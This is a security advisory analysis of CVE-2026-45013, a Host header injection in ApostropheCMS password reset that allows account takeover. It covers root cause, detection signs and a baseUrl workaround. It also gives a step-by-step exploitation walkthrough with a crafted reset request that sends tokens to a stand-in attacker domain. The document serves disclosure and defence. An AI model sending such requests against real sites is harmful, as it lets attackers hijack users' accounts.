CVE-2026-45013: 
JavaScript Analyse et atténuation des vulnérabilités

CVE-2026-45013 is a Host Header Injection vulnerability in ApostropheCMS's password reset flow that enables full account takeover. The vulnerability affects the apostrophe npm package at versions <= 4.29.0, with no patched version currently available. It was published on May 13, 2026, by maintainer boutell and added to the GitHub Advisory Database on May 14, 2026. The CVE carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, ApostropheCMS Advisory).

The root cause is improper input validation (CWE-20) combined with a weak password recovery mechanism (CWE-640). The setPrefixUrls middleware in ApostropheCMS constructs req.baseUrl and req.absoluteUrl directly from the HTTP Host header via req.hostname, without sanitization. The resetRequest route in modules/@apostrophecms/login/index.js then uses this tainted value to build the password reset URL, appending the real, valid reset token as a query parameter before emailing it to the victim. This attack path is only active when passwordReset: true is set in the login module options and apos.baseUrl is not explicitly configured — a condition described as common in development and some production deployments. When apos.baseUrl is configured, it is used unconditionally and the attacker's Host header is ignored (GitHub Advisory).

Successful exploitation results in full account takeover of any user account whose email address is known to the attacker. The attacker gains high confidentiality and integrity impact — they can capture a valid password reset token, reset the victim's password, and authenticate as that user, potentially accessing all data and functionality available to that account. Availability is not directly impacted. Because no authentication is required from the attacker and the victim only needs to click a link in a legitimate-looking email from their own site, the social engineering barrier is low (ApostropheCMS Advisory).

1. Reconnaissance: Identify an ApostropheCMS instance running apostrophe npm package <= 4.29.0 with passwordReset: true enabled and apos.baseUrl not configured. Enumerate a valid user email address from the site's public interface (e.g., author pages, contact forms, or public profiles).
2. Craft malicious request: Prepare a POST request to the password reset endpoint with the Host header set to an attacker-controlled domain:

POST /api/v1/login/reset-request
Host: evil.attacker.com
Content-Type: application/json

{"email": "victim@example.com"}

3. Trigger reset email: Send the crafted request to the target ApostropheCMS server. The application's setPrefixUrls middleware reads req.hostname from the spoofed Host header and constructs the reset URL pointing to evil.attacker.com.
4. Capture the token: The application emails the victim a legitimate-looking password reset link such as http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com. Set up an HTTP listener on the attacker-controlled domain to capture incoming requests and extract the reset token parameter when the victim clicks the link.
5. Account takeover: Use the captured TOKEN to call the real target site's password reset completion endpoint, set a new password, and authenticate as the victim — achieving full account takeover (ApostropheCMS Advisory).

• Network: Outbound SMTP traffic delivering password reset emails containing URLs pointing to unexpected or external domains (not the site's own domain); HTTP POST requests to /api/v1/login/reset-request with a Host header value that does not match the legitimate site domain.
• Logs: Web server access logs showing POST /api/v1/login/reset-request requests with anomalous Host header values (e.g., Host: evil.attacker.com); email delivery logs showing reset emails sent to users who did not initiate a reset, or reset emails with URLs containing external domains.
• Application: Multiple password reset requests for the same email address in a short time window; password reset tokens being consumed shortly after issuance without a corresponding login from the expected IP range (ApostropheCMS Advisory).

No patched version of the apostrophe npm package is currently available (all versions <= 4.29.0 are affected). The primary immediate workaround is to explicitly configure apos.baseUrl in the ApostropheCMS application configuration, which causes the reset URL to be constructed from the trusted configured value rather than the attacker-controlled Host header:

// app.js or module configuration
modules: {
  '@apostrophecms/express': {
    options: {
      baseUrl: 'https://yourdomain.com'
    }
  }
}

Additionally, operators should implement Host header validation at the reverse proxy or web server layer to reject requests with unexpected Host values, and consider disabling passwordReset: true if the feature is not strictly required until a framework-level fix is released (ApostropheCMS Advisory).

The advisory was published by ApostropheCMS maintainer boutell directly in the project's GitHub Security Advisories on May 13, 2026, and credited researchers Mujahidkhan525 (finder) and VadlaReddySai (reporter). No significant broader media coverage or notable public researcher commentary beyond the advisory itself has been observed at this time (ApostropheCMS Advisory).